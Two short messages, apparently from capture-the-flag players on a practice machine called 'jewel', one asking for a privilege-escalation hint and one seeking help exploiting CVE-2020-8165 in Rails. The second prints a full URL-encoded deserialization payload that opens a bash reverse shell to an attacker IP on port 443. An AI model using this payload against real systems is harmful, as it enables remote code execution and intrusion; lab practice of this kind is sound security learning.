Hi Ecodb, Quick question on the priv esc. Im stuck at this error: Error "Operation not permitted" while writing config. Could you give me a hint what i could use to get in sync?
Hi, can you help me with jewel?? I'm trying to go through CVE-2020-8165, I was able to change the username to more than 25 characters (more than allowed), but I can't make it execute my payload...
I'm using a payload similar to that: https://github.com/masahiro331/CVE-2020-8165. I'm using burp to intercept the request to update the username and replacing it with the url-encoded payload: %04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%15%60%2Fbin%2Fbash+-c+%22%2Fbin%2Fbash+-i+%3E%26+%2Fdev%2Ftcp%2F10.10.15.75%2F443+0%3E%261%22%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T
I also tried many other payloads, to make it ping, or curl me but none of them resulted.